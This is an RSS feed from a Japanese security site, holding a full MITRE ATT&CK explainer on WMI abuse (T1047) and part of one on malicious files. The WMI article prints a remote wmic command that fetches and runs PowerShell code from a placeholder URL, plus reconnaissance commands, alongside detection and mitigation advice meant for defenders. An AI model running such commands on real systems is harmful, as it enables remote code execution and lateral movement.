<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>AI Security Review</title>
	<atom:link href="https://ai-sec-review.com/feed/" rel="self" type="application/rss+xml" />
	<link>https://ai-sec-review.com/</link>
	<description>AI執筆×セキュリティ実務者監修のツールレビューサイト</description>
	<lastBuildDate>Thu, 02 Apr 2026 11:58:12 +0000</lastBuildDate>
	<language>ja</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.9.4</generator>

<image>
	<url>https://ai-sec-review.com/wp-content/uploads/2026/03/favicon_512-100x100.png</url>
	<title>AI Security Review</title>
	<link>https://ai-sec-review.com/</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>セキュリティソフト内蔵VPN vs 専用VPN比較2026【ノートン vs NordVPN 徹底解説】</title>
		<link>https://ai-sec-review.com/%e3%82%bb%e3%82%ad%e3%83%a5%e3%83%aa%e3%83%86%e3%82%a3%e3%82%bd%e3%83%95%e3%83%88%e5%86%85%e8%94%b5vpn-vs-%e5%b0%82%e7%94%a8vpn%e6%af%94%e8%bc%832026%e3%80%90%e3%83%8e%e3%83%bc%e3%83%88%e3%83%b3-vs-no/</link>
					<comments>https://ai-sec-review.com/%e3%82%bb%e3%82%ad%e3%83%a5%e3%83%aa%e3%83%86%e3%82%a3%e3%82%bd%e3%83%95%e3%83%88%e5%86%85%e8%94%b5vpn-vs-%e5%b0%82%e7%94%a8vpn%e6%af%94%e8%bc%832026%e3%80%90%e3%83%8e%e3%83%bc%e3%83%88%e3%83%b3-vs-no/#respond</comments>
		
		<dc:creator><![CDATA[]]></dc:creator>
		<pubDate>Thu, 02 Apr 2026 11:58:12 +0000</pubDate>
				<category><![CDATA[セキュリティ基礎知識]]></category>
		<guid isPermaLink="false">https://ai-sec-review.com/%e3%82%bb%e3%82%ad%e3%83%a5%e3%83%aa%e3%83%86%e3%82%a3%e3%82%bd%e3%83%95%e3%83%88%e5%86%85%e8%94%b5vpn-vs-%e5%b0%82%e7%94%a8vpn%e6%af%94%e8%bc%832026%e3%80%90%e3%83%8e%e3%83%bc%e3%83%88%e3%83%b3-vs-no/</guid>

					<description><![CDATA[<p>The post <a href="https://ai-sec-review.com/%e3%82%bb%e3%82%ad%e3%83%a5%e3%83%aa%e3%83%86%e3%82%a3%e3%82%bd%e3%83%95%e3%83%88%e5%86%85%e8%94%b5vpn-vs-%e5%b0%82%e7%94%a8vpn%e6%af%94%e8%bc%832026%e3%80%90%e3%83%8e%e3%83%bc%e3%83%88%e3%83%b3-vs-no/">セキュリティソフト内蔵VPN vs 専用VPN比較2026【ノートン vs NordVPN 徹底解説】</a> appeared first on <a href="https://ai-sec-review.com">AI Security Review</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>The post <a href="https://ai-sec-review.com/%e3%82%bb%e3%82%ad%e3%83%a5%e3%83%aa%e3%83%86%e3%82%a3%e3%82%bd%e3%83%95%e3%83%88%e5%86%85%e8%94%b5vpn-vs-%e5%b0%82%e7%94%a8vpn%e6%af%94%e8%bc%832026%e3%80%90%e3%83%8e%e3%83%bc%e3%83%88%e3%83%b3-vs-no/">セキュリティソフト内蔵VPN vs 専用VPN比較2026【ノートン vs NordVPN 徹底解説】</a> appeared first on <a href="https://ai-sec-review.com">AI Security Review</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://ai-sec-review.com/%e3%82%bb%e3%82%ad%e3%83%a5%e3%83%aa%e3%83%86%e3%82%a3%e3%82%bd%e3%83%95%e3%83%88%e5%86%85%e8%94%b5vpn-vs-%e5%b0%82%e7%94%a8vpn%e6%af%94%e8%bc%832026%e3%80%90%e3%83%8e%e3%83%bc%e3%83%88%e3%83%b3-vs-no/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>セキュリティソフト「買い切り型」vs「サブスク型」長期コスト比較2026【3・5年試算表あり】</title>
		<link>https://ai-sec-review.com/%e3%82%bb%e3%82%ad%e3%83%a5%e3%83%aa%e3%83%86%e3%82%a3%e3%82%bd%e3%83%95%e3%83%88%e3%80%8c%e8%b2%b7%e3%81%84%e5%88%87%e3%82%8a%e5%9e%8b%e3%80%8dvs%e3%80%8c%e3%82%b5%e3%83%96%e3%82%b9%e3%82%af%e5%9e%8b/</link>
					<comments>https://ai-sec-review.com/%e3%82%bb%e3%82%ad%e3%83%a5%e3%83%aa%e3%83%86%e3%82%a3%e3%82%bd%e3%83%95%e3%83%88%e3%80%8c%e8%b2%b7%e3%81%84%e5%88%87%e3%82%8a%e5%9e%8b%e3%80%8dvs%e3%80%8c%e3%82%b5%e3%83%96%e3%82%b9%e3%82%af%e5%9e%8b/#respond</comments>
		
		<dc:creator><![CDATA[]]></dc:creator>
		<pubDate>Thu, 02 Apr 2026 11:58:06 +0000</pubDate>
				<category><![CDATA[セキュリティ基礎知識]]></category>
		<guid isPermaLink="false">https://ai-sec-review.com/%e3%82%bb%e3%82%ad%e3%83%a5%e3%83%aa%e3%83%86%e3%82%a3%e3%82%bd%e3%83%95%e3%83%88%e3%80%8c%e8%b2%b7%e3%81%84%e5%88%87%e3%82%8a%e5%9e%8b%e3%80%8dvs%e3%80%8c%e3%82%b5%e3%83%96%e3%82%b9%e3%82%af%e5%9e%8b/</guid>

					<description><![CDATA[<p>The post <a href="https://ai-sec-review.com/%e3%82%bb%e3%82%ad%e3%83%a5%e3%83%aa%e3%83%86%e3%82%a3%e3%82%bd%e3%83%95%e3%83%88%e3%80%8c%e8%b2%b7%e3%81%84%e5%88%87%e3%82%8a%e5%9e%8b%e3%80%8dvs%e3%80%8c%e3%82%b5%e3%83%96%e3%82%b9%e3%82%af%e5%9e%8b/">セキュリティソフト「買い切り型」vs「サブスク型」長期コスト比較2026【3・5年試算表あり】</a> appeared first on <a href="https://ai-sec-review.com">AI Security Review</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>The post <a href="https://ai-sec-review.com/%e3%82%bb%e3%82%ad%e3%83%a5%e3%83%aa%e3%83%86%e3%82%a3%e3%82%bd%e3%83%95%e3%83%88%e3%80%8c%e8%b2%b7%e3%81%84%e5%88%87%e3%82%8a%e5%9e%8b%e3%80%8dvs%e3%80%8c%e3%82%b5%e3%83%96%e3%82%b9%e3%82%af%e5%9e%8b/">セキュリティソフト「買い切り型」vs「サブスク型」長期コスト比較2026【3・5年試算表あり】</a> appeared first on <a href="https://ai-sec-review.com">AI Security Review</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://ai-sec-review.com/%e3%82%bb%e3%82%ad%e3%83%a5%e3%83%aa%e3%83%86%e3%82%a3%e3%82%bd%e3%83%95%e3%83%88%e3%80%8c%e8%b2%b7%e3%81%84%e5%88%87%e3%82%8a%e5%9e%8b%e3%80%8dvs%e3%80%8c%e3%82%b5%e3%83%96%e3%82%b9%e3%82%af%e5%9e%8b/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>ウイルスバスターのインストール手順をわかりやすく解説【シニア・初心者向け】</title>
		<link>https://ai-sec-review.com/%e3%82%a6%e3%82%a4%e3%83%ab%e3%82%b9%e3%83%90%e3%82%b9%e3%82%bf%e3%83%bc%e3%81%ae%e3%82%a4%e3%83%b3%e3%82%b9%e3%83%88%e3%83%bc%e3%83%ab%e6%89%8b%e9%a0%86%e3%82%92%e3%82%8f%e3%81%8b%e3%82%8a%e3%82%84/</link>
					<comments>https://ai-sec-review.com/%e3%82%a6%e3%82%a4%e3%83%ab%e3%82%b9%e3%83%90%e3%82%b9%e3%82%bf%e3%83%bc%e3%81%ae%e3%82%a4%e3%83%b3%e3%82%b9%e3%83%88%e3%83%bc%e3%83%ab%e6%89%8b%e9%a0%86%e3%82%92%e3%82%8f%e3%81%8b%e3%82%8a%e3%82%84/#respond</comments>
		
		<dc:creator><![CDATA[]]></dc:creator>
		<pubDate>Thu, 02 Apr 2026 11:58:01 +0000</pubDate>
				<category><![CDATA[セキュリティ基礎知識]]></category>
		<guid isPermaLink="false">https://ai-sec-review.com/%e3%82%a6%e3%82%a4%e3%83%ab%e3%82%b9%e3%83%90%e3%82%b9%e3%82%bf%e3%83%bc%e3%81%ae%e3%82%a4%e3%83%b3%e3%82%b9%e3%83%88%e3%83%bc%e3%83%ab%e6%89%8b%e9%a0%86%e3%82%92%e3%82%8f%e3%81%8b%e3%82%8a%e3%82%84/</guid>

					<description><![CDATA[<p>The post <a href="https://ai-sec-review.com/%e3%82%a6%e3%82%a4%e3%83%ab%e3%82%b9%e3%83%90%e3%82%b9%e3%82%bf%e3%83%bc%e3%81%ae%e3%82%a4%e3%83%b3%e3%82%b9%e3%83%88%e3%83%bc%e3%83%ab%e6%89%8b%e9%a0%86%e3%82%92%e3%82%8f%e3%81%8b%e3%82%8a%e3%82%84/">ウイルスバスターのインストール手順をわかりやすく解説【シニア・初心者向け】</a> appeared first on <a href="https://ai-sec-review.com">AI Security Review</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>The post <a href="https://ai-sec-review.com/%e3%82%a6%e3%82%a4%e3%83%ab%e3%82%b9%e3%83%90%e3%82%b9%e3%82%bf%e3%83%bc%e3%81%ae%e3%82%a4%e3%83%b3%e3%82%b9%e3%83%88%e3%83%bc%e3%83%ab%e6%89%8b%e9%a0%86%e3%82%92%e3%82%8f%e3%81%8b%e3%82%8a%e3%82%84/">ウイルスバスターのインストール手順をわかりやすく解説【シニア・初心者向け】</a> appeared first on <a href="https://ai-sec-review.com">AI Security Review</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://ai-sec-review.com/%e3%82%a6%e3%82%a4%e3%83%ab%e3%82%b9%e3%83%90%e3%82%b9%e3%82%bf%e3%83%bc%e3%81%ae%e3%82%a4%e3%83%b3%e3%82%b9%e3%83%88%e3%83%bc%e3%83%ab%e6%89%8b%e9%a0%86%e3%82%92%e3%82%8f%e3%81%8b%e3%82%8a%e3%82%84/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>シニア・高齢者向けセキュリティソフトおすすめ比較【電話サポート・操作しやすさ重視】</title>
		<link>https://ai-sec-review.com/%e3%82%b7%e3%83%8b%e3%82%a2%e3%83%bb%e9%ab%98%e9%bd%a2%e8%80%85%e5%90%91%e3%81%91%e3%82%bb%e3%82%ad%e3%83%a5%e3%83%aa%e3%83%86%e3%82%a3%e3%82%bd%e3%83%95%e3%83%88%e3%81%8a%e3%81%99%e3%81%99%e3%82%81/</link>
					<comments>https://ai-sec-review.com/%e3%82%b7%e3%83%8b%e3%82%a2%e3%83%bb%e9%ab%98%e9%bd%a2%e8%80%85%e5%90%91%e3%81%91%e3%82%bb%e3%82%ad%e3%83%a5%e3%83%aa%e3%83%86%e3%82%a3%e3%82%bd%e3%83%95%e3%83%88%e3%81%8a%e3%81%99%e3%81%99%e3%82%81/#respond</comments>
		
		<dc:creator><![CDATA[]]></dc:creator>
		<pubDate>Thu, 02 Apr 2026 11:57:56 +0000</pubDate>
				<category><![CDATA[セキュリティ基礎知識]]></category>
		<guid isPermaLink="false">https://ai-sec-review.com/%e3%82%b7%e3%83%8b%e3%82%a2%e3%83%bb%e9%ab%98%e9%bd%a2%e8%80%85%e5%90%91%e3%81%91%e3%82%bb%e3%82%ad%e3%83%a5%e3%83%aa%e3%83%86%e3%82%a3%e3%82%bd%e3%83%95%e3%83%88%e3%81%8a%e3%81%99%e3%81%99%e3%82%81/</guid>

					<description><![CDATA[<p>The post <a href="https://ai-sec-review.com/%e3%82%b7%e3%83%8b%e3%82%a2%e3%83%bb%e9%ab%98%e9%bd%a2%e8%80%85%e5%90%91%e3%81%91%e3%82%bb%e3%82%ad%e3%83%a5%e3%83%aa%e3%83%86%e3%82%a3%e3%82%bd%e3%83%95%e3%83%88%e3%81%8a%e3%81%99%e3%81%99%e3%82%81/">シニア・高齢者向けセキュリティソフトおすすめ比較【電話サポート・操作しやすさ重視】</a> appeared first on <a href="https://ai-sec-review.com">AI Security Review</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>The post <a href="https://ai-sec-review.com/%e3%82%b7%e3%83%8b%e3%82%a2%e3%83%bb%e9%ab%98%e9%bd%a2%e8%80%85%e5%90%91%e3%81%91%e3%82%bb%e3%82%ad%e3%83%a5%e3%83%aa%e3%83%86%e3%82%a3%e3%82%bd%e3%83%95%e3%83%88%e3%81%8a%e3%81%99%e3%81%99%e3%82%81/">シニア・高齢者向けセキュリティソフトおすすめ比較【電話サポート・操作しやすさ重視】</a> appeared first on <a href="https://ai-sec-review.com">AI Security Review</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://ai-sec-review.com/%e3%82%b7%e3%83%8b%e3%82%a2%e3%83%bb%e9%ab%98%e9%bd%a2%e8%80%85%e5%90%91%e3%81%91%e3%82%bb%e3%82%ad%e3%83%a5%e3%83%aa%e3%83%86%e3%82%a3%e3%82%bd%e3%83%95%e3%83%88%e3%81%8a%e3%81%99%e3%81%99%e3%82%81/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>T1047 Windows Management Instrumentationとは？MITRE ATT&#038;CK日本語解説</title>
		<link>https://ai-sec-review.com/mitre-attck-t1047-wmi/</link>
					<comments>https://ai-sec-review.com/mitre-attck-t1047-wmi/#respond</comments>
		
		<dc:creator><![CDATA[]]></dc:creator>
		<pubDate>Wed, 25 Mar 2026 20:19:45 +0000</pubDate>
				<category><![CDATA[5]]></category>
		<guid isPermaLink="false">https://ai-sec-review.com/?p=2074</guid>

					<description><![CDATA[<p>※本記事にはアフィリエイトリンクが含まれます。詳しくはプライバシーポリシー・広告掲載についてをご覧ください。 Windows Management Instrumentation（WMI）はWindows環境の管理に不可 [&#8230;]</p>
<p>The post <a href="https://ai-sec-review.com/mitre-attck-t1047-wmi/">T1047 Windows Management Instrumentationとは？MITRE ATT&#038;CK日本語解説</a> appeared first on <a href="https://ai-sec-review.com">AI Security Review</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>※本記事にはアフィリエイトリンクが含まれます。詳しくは<a href="https://ai-sec-review.com/disclosure/">プライバシーポリシー・広告掲載について</a>をご覧ください。</p>



<p>Windows Management Instrumentation（WMI）はWindows環境の管理に不可欠なインフラですが、攻撃者にとっても強力な武器です。MITRE ATT&#038;CKでは<strong>T1047 Windows Management Instrumentation</strong>として分類されており、APTグループからランサムウェアまで幅広く悪用されています。本記事では、WMIを使った攻撃手法、実際の攻撃事例、検出方法と緩和策を日本語で詳しく解説します。</p>



<p><em>※本サイトはMITRE ATT&#038;CK®の非公式日本語解説サイトです。Based on MITRE ATT&#038;CK® v16。</em></p>



<h2 class="wp-block-heading">ATT&#038;CK情報</h2>



<figure class="wp-block-table"><table><tbody><tr><td><strong>ATT&#038;CK ID</strong></td><td>T1047</td></tr><tr><td><strong>Tactic</strong></td><td>Execution（実行 / TA0002）</td></tr><tr><td><strong>対応バージョン</strong></td><td>ATT&#038;CK v16</td></tr><tr><td><strong>対応プラットフォーム</strong></td><td>Windows</td></tr></tbody></table></figure>



<h2 class="wp-block-heading">概要</h2>



<p>T1047は<strong>Execution（実行 / TA0002）</strong>タクティクスに属するテクニックです。WMI（Windows Management Instrumentation）はWindowsに標準搭載された管理基盤で、システム情報の収集、プロセス管理、リモートでのコマンド実行、イベント監視などの機能を提供します。</p>



<p>攻撃者はWMIを使って、<strong>ローカルおよびリモートでのコマンド実行</strong>、<strong>システム情報の偵察</strong>、<strong>永続化メカニズムの設置</strong>（WMIイベントサブスクリプション）、<strong>横展開（Lateral Movement）</strong>を行います。WMIはOS標準機能であり、正規の管理操作と攻撃を区別しにくいため、Living-off-the-Land手法の代表格です。</p>



<p>WMIへのアクセスは主に3つの方法で行われます：<code>wmic.exe</code>コマンドラインツール（非推奨だがまだ利用可能）、PowerShellの<code>Get-WmiObject</code>/<code>Get-CimInstance</code>コマンドレット、そしてWMIのCOMインターフェースを直接利用するスクリプトです。</p>



<h2 class="wp-block-heading">攻撃シナリオ例</h2>



<h3 class="wp-block-heading">APT29（Cozy Bear）— WMIによるリモートコマンド実行</h3>



<p>APT29は、初期侵入後の横展開フェーズでWMIを積極的に活用します。窃取した管理者資格情報を使い、WMIのリモート実行機能で他のマシンにペイロードを展開します：</p>



<pre class="wp-block-code"><code>:: WMICによるリモートプロセス実行の例（検知テスト用）
wmic /node:"192.168.1.100" /user:"DOMAIN\admin" /password:"..." process call create "cmd.exe /c powershell -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://...')"</code></pre>



<p>この手法はRDP（リモートデスクトップ）と異なりGUIの操作痕跡を残さないため、フォレンジック調査で発見されにくい特徴があります。</p>



<h3 class="wp-block-heading">WMIイベントサブスクリプションによる永続化</h3>



<p>WMIイベントサブスクリプションは、特定のイベント（ユーザーログオン、特定時刻の到来など）をトリガーにしてコードを自動実行する仕組みです。攻撃者はこれを永続化メカニズムとして利用します：</p>



<ul class="wp-block-list">
<li><strong>EventFilter</strong>: トリガー条件を定義（例: ユーザーがログオンした時）</li>
<li><strong>EventConsumer</strong>: 実行するアクション（例: PowerShellスクリプトを実行）</li>
<li><strong>FilterToConsumerBinding</strong>: トリガーとアクションを紐付け</li>
</ul>



<p>この永続化手法はレジストリやスタートアップフォルダに痕跡を残さないため、従来の自動起動チェックでは発見が困難です。</p>



<h3 class="wp-block-heading">ランサムウェアグループ — WMIによる大量展開</h3>



<p>Ryuk、Contiなどのランサムウェアグループは、ドメイン管理者権限を取得した後、WMIを使ってネットワーク内の全マシンにランサムウェアを一斉展開します。<code>wmic /node:@targets.txt process call create</code>のようなコマンドで数百台のマシンに同時にペイロードを実行させ、被害を最大化します。</p>



<h3 class="wp-block-heading">WMIによるシステム偵察</h3>



<p>攻撃者は侵入後の情報収集にもWMIを多用します：</p>



<pre class="wp-block-code"><code>:: WMIによる偵察コマンドの例
wmic os get caption,version,osarchitecture    &amp;:: OS情報
wmic process list brief                       &amp;:: 実行中プロセス一覧
wmic service list brief                       &amp;:: サービス一覧
wmic useraccount list brief                   &amp;:: ユーザーアカウント一覧
wmic qfe list                                 &amp;:: インストール済みパッチ一覧
wmic product get name,version                 &amp;:: インストール済みソフトウェア</code></pre>



<h2 class="wp-block-heading">検出方法</h2>



<h3 class="wp-block-heading">プロセス監視</h3>



<ul class="wp-block-list">
<li><strong>wmic.exeの実行監視</strong>（Sysmon Event ID 1）: 特に<code>/node:</code>パラメータ（リモート実行）や<code>process call create</code>（プロセス生成）を含む実行を検出</li>
<li><strong>WmiPrvSE.exeの子プロセス</strong>: WMIプロバイダーホストプロセス（<code>WmiPrvSE.exe</code>）から<code>cmd.exe</code>/<code>powershell.exe</code>が起動された場合はリモートWMI実行の指標</li>
<li><strong>scrcons.exeの実行</strong>: WMIイベントサブスクリプションのスクリプトコンシューマーが実行された場合、永続化の可能性</li>
</ul>



<h3 class="wp-block-heading">Windowsイベントログ</h3>



<ul class="wp-block-list">
<li><strong>Microsoft-Windows-WMI-Activity/Operational（Event ID 5857〜5861）</strong>: WMIプロバイダーのロード、一時的/永続的イベントサブスクリプションの登録を記録</li>
<li><strong>Sysmon Event ID 19/20/21</strong>: WMIイベントフィルタ/コンシューマー/バインディングの作成を検出（永続化メカニズムの設置を検出）</li>
<li><strong>Sysmon Event ID 1</strong>: wmic.exeの起動とコマンドライン引数を記録</li>
<li><strong>Security Event ID 4648</strong>: 明示的な資格情報を使用したリモートWMI接続を検出</li>
</ul>



<h3 class="wp-block-heading">ネットワーク監視</h3>



<ul class="wp-block-list">
<li><strong>DCOM/RPC通信</strong>: TCP 135（RPC Endpoint Mapper）とランダム高ポートを使用するDCOM通信を監視</li>
<li><strong>WinRM通信</strong>: TCP 5985/5986（HTTP/HTTPS）でのCIM/WMI通信を監視</li>
</ul>



<h2 class="wp-block-heading">緩和策（Mitigations）</h2>



<figure class="wp-block-table"><table><thead><tr><th>ID</th><th>緩和策名</th><th>概要</th></tr></thead><tbody><tr><td>M1026</td><td>Privileged Account Management</td><td>WMIのリモート実行を管理者アカウントに限定し、特権アカウントの管理を厳格化</td></tr><tr><td>M1040</td><td>Behavior Prevention on Endpoint</td><td>EDRでWmiPrvSE.exeからの不審な子プロセス起動をブロック</td></tr><tr><td>M1038</td><td>Execution Prevention</td><td>AppLocker/WDACでwmic.exeの使用を制限</td></tr><tr><td>M1018</td><td>User Account Management</td><td>リモートWMIへのアクセス権を必要最小限のユーザーに制限</td></tr></tbody></table></figure>



<h3 class="wp-block-heading">実務での推奨対策</h3>



<ul class="wp-block-list">
<li><strong>wmic.exeの使用制限</strong>: Microsoftはwmic.exeを非推奨としている。AppLocker/WDACでwmic.exeの実行をブロックし、必要な場合はPowerShellのGet-CimInstanceに移行</li>
<li><strong>WMI名前空間のACL設定</strong>: <code>wmimgmt.msc</code>でWMI名前空間のアクセス権を確認し、リモートアクセスを許可するアカウントを最小限に制限</li>
<li><strong>Sysmon導入・設定</strong>: Event ID 19/20/21でWMIイベントサブスクリプションの作成を監視し、永続化の試みを検出</li>
<li><strong>Windows Firewallの設定</strong>: 不要なリモートWMI（DCOM/RPC）通信をファイアウォールでブロック</li>
<li><strong>WMIイベントサブスクリプションの定期監査</strong>: <code>Get-WmiObject -Namespace root\subscription -Class __EventFilter</code>で不審なイベントフィルタを定期的にチェック</li>
</ul>



<h2 class="wp-block-heading">関連するテクニック</h2>



<ul class="wp-block-list">
<li><strong><a href="https://ai-sec-review.com/mitre-attck-t1059-command-scripting-interpreter/">T1059 Command and Scripting Interpreter</a></strong>: WMI経由で実行されるスクリプト（<a href="https://ai-sec-review.com/mitre-attck-t1059-001-powershell/">PowerShell</a>、<a href="https://ai-sec-review.com/mitre-attck-t1059-003-windows-command-shell/">cmd.exe</a>等）</li>
<li><strong>T1546.003 WMI Event Subscription</strong>: WMIイベントサブスクリプションによる永続化（Persistence）</li>
<li><strong><a href="https://ai-sec-review.com/mitre-attck-t1204-user-execution/">T1204 User Execution</a></strong>: ユーザー操作を起点としてWMI経由のスクリプト実行に連鎖するパターン</li>
</ul>



<h2 class="wp-block-heading">おすすめセキュリティ対策ツール</h2>



<p>本記事で紹介した対策を実施するうえで役立つ製品をご紹介します。</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow"><p><strong>🛡️ まず今日から始めるなら：エンドポイント保護ソフトの導入</strong><br>攻撃者がWMIを使用する場合、振る舞い検知機能を持つエンドポイント保護が有効な緩和策となります。</p></blockquote>



<ul class="wp-block-list">
<li><a rel="nofollow sponsored" href="https://px.a8.net/svt/ejp?a8mat=4AZE02+22F7EA+4OQ4+5YRHE"><strong>ESET（イーセット）</strong></a> ※PR — 軽量・企業向け実績あり</li>
<li><a rel="nofollow sponsored" href="https://px.a8.net/svt/ejp?a8mat=4AZE02+23M2LU+5AZU+61Z81"><strong>ウイルスバスター</strong></a> ※PR — 日本語サポート充実・国産</li>
<li><a rel="nofollow sponsored" href="https://px.a8.net/svt/ejp?a8mat=4AZE02+230N02+3VKO+5YRHE"><strong>Norton（ノートン）</strong></a> ※PR — 世界最大手・VPN機能付き</li>
</ul>



<p>※ 上記はアフィリエイトリンクです。料金・機能は各公式サイトで必ずご確認ください。</p>



<h2 class="wp-block-heading">まとめ</h2>



<ul class="wp-block-list">
<li>T1047 WMIは、Windows標準の管理基盤を悪用するLiving-off-the-Land手法であり、攻撃チェーンの複数段階で使用される</li>
<li>リモートコマンド実行、WMIイベントサブスクリプションによる永続化、ランサムウェアの大量展開が主な悪用パターン</li>
<li>Sysmon Event ID 19/20/21によるWMIサブスクリプション監視、WmiPrvSE.exeの子プロセス監視が検出の鍵</li>
<li>wmic.exeの使用制限、WMI名前空間ACLの厳格化、リモートDCOM通信の制限が有効な緩和策</li>
</ul>



<h2 class="wp-block-heading">参考文献</h2>



<ul class="wp-block-list">
<li><a rel="noopener" href="https://attack.mitre.org/techniques/T1047/" target="_blank">MITRE ATT&#038;CK — T1047 Windows Management Instrumentation</a></li>
<li><a rel="noopener" href="https://www.ipa.go.jp/security/" target="_blank">IPA（情報処理推進機構）セキュリティセンター</a></li>
<li><a rel="noopener" href="https://attack.mitre.org/" target="_blank">MITRE ATT&#038;CK公式サイト</a></li>
</ul>



<p><em>Based on MITRE ATT&#038;CK® v16, © The MITRE Corporation. Licensed under Apache License 2.0.<br>本ページは非公式翻訳・解説です。正確な情報はMITRE公式サイト（<a rel="noopener" href="https://attack.mitre.org/" target="_blank">https://attack.mitre.org/</a>）をご参照ください。</em></p>
<p>The post <a href="https://ai-sec-review.com/mitre-attck-t1047-wmi/">T1047 Windows Management Instrumentationとは？MITRE ATT&#038;CK日本語解説</a> appeared first on <a href="https://ai-sec-review.com">AI Security Review</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://ai-sec-review.com/mitre-attck-t1047-wmi/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>T1204.002 Malicious Fileとは？MITRE ATT&#038;CK日本語解説</title>
		<link>https://ai-sec-review.com/mitre-attck-t1204-002-malicious-file/</link>
					<comments>https://ai-sec-review.com/mitre-attck-t1204-002-malicious-file/#respond</comments>
		
		<dc:creator><![CDATA[]]></dc:creator>
		<pubDate>Wed, 25 Mar 2026 20:18:50 +0000</pubDate>
				<category><![CDATA[5]]></category>
		<guid isPermaLink="false">https://ai-sec-review.com/?p=2073</guid>

					<description><![CDATA[<p>※本記事にはアフィリエイトリンクが含まれます。詳しくはプライバシーポリシー・広告掲載についてをご覧ください。 メールに添付されたExcelファイルを開いたら感染した——この典型的な攻撃パターンは、MITRE ATT&#0 [&#8230;]</p>
<p>The post <a href="https://ai-sec-review.com/mitre-attck-t1204-002-malicious-file/">T1204.002 Malicious Fileとは？MITRE ATT&#038;CK日本語解説</a> appeared first on <a href="https://ai-sec-review.com">AI Security Review</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>※本記事にはアフィリエイトリンクが含まれます。詳しくは<a href="https://ai-sec-review.com/disclosure/">プライバシーポリシー・広告掲載について</a>をご覧ください。</p>



<p>メールに添付されたExcelファイルを開いたら感染した——この典型的な攻撃パターンは、MITRE ATT&#038;CKで<strong>T1204.002 Malicious File</strong>として体系化されています。Office文書のマクロ、偽のPDF、二重拡張子の実行ファイルなど、攻撃者はさまざまな手口でユーザーに悪意あるファイルを実行させます。本記事では、Malicious Fileの攻撃手法、検出方法、実務で有効な緩和策を日本語で詳しく解説します。</p>



<p><em>※本サイトはMITRE ATT&#038;CK®の非公式日本語解説サイトです。Based on MITRE ATT&#038;CK® v16。</em></p>



<h2 class="wp-block-heading">ATT&#038;CK情報</h2>



<figure class="wp-block-table"><table><tbody><tr><td><strong>ATT&#038;CK ID</strong></td><td>T1204.002</td></tr><tr><td><strong>Tactic</strong></td><td>Execution（実行 / TA0002）</td></tr><tr><td><strong>対応バージョン</strong></td><td>ATT&#038;CK v16</td></tr><tr><td><strong>対応プラットフォーム</strong></td><td>Windows / macOS / Linux</td></tr><tr><td><strong>親テクニック</strong></td><td><a href="https://ai-sec-review.com/mitre-attck-t1204-user-execution/">T1204 User Execution</a></td></tr></tbody></table></figure>



<h2 class="wp-block-heading">概要</h2>



<p>T1204.002は、<strong><a href="https://ai-sec-review.com/mitre-attck-t1204-user-execution/">T1204 User Execution</a></strong>のSub-techniqueです。攻撃者はソーシャルエンジニアリングを使って、ユーザーに悪意あるファイルを開かせ、コードを実行させます。ファイルの種類は多岐にわたり、Office文書（マクロ付きWord/Excel）、PDF、ISO/IMGディスクイメージ、LNKショートカット、実行ファイル（.exe、.scr）、スクリプトファイル（.js、.vbs、.ps1）などが使用されます。</p>



<p>この手法は<strong>T1566.001（Spearphishing Attachment）</strong>と密接に関連しています。T1566.001がメール経由での配信（Initial Access）を指すのに対し、T1204.002はユーザーがファイルを開いて実行する行為（Execution）を指します。攻撃チェーンでは、T1566.001 → T1204.002 → <a href="https://ai-sec-review.com/mitre-attck-t1059-command-scripting-interpreter/">T1059</a>（スクリプト実行）という流れが典型的です。</p>



<p>近年はMicrosoftがインターネットからダウンロードしたOffice文書のマクロをデフォルトでブロックするようになったため、攻撃者はISO/IMGファイル、OneNote添付ファイル、LNKショートカットなど<strong>マクロに依存しない手法</strong>に移行する傾向が顕著です。</p>



<h2 class="wp-block-heading">攻撃シナリオ例</h2>



<h3 class="wp-block-heading">Emotet — Office文書マクロによる感染チェーン</h3>



<p>Emotetの代表的な感染チェーンは、業務メールを装ったOffice文書の添付ファイルです：</p>



<ol class="wp-block-list">
<li>請求書や見積書を装ったWord/Excelファイルがメールで配信される</li>
<li>ユーザーがファイルを開くと「コンテンツの有効化」を促す画面が表示される</li>
<li>ユーザーが「コンテンツの有効化」をクリックすると、<a href="https://ai-sec-review.com/?p=1998">VBAマクロ（T1059.005）</a>が実行される</li>
<li>マクロが<a href="https://ai-sec-review.com/mitre-attck-t1059-001-powershell/">PowerShell（T1059.001）</a>を起動し、C2サーバーからEmotet本体をダウンロード・実行</li>
</ol>



<h3 class="wp-block-heading">Qakbot — ISO/LNKファイルによるマクロ回避</h3>



<p>Microsoftのマクロブロック後、QakbotはISOファイルを使った新しい感染手法に切り替えました：</p>



<ol class="wp-block-list">
<li>メールにISOディスクイメージファイル（または ZIP内のISO）が添付される</li>
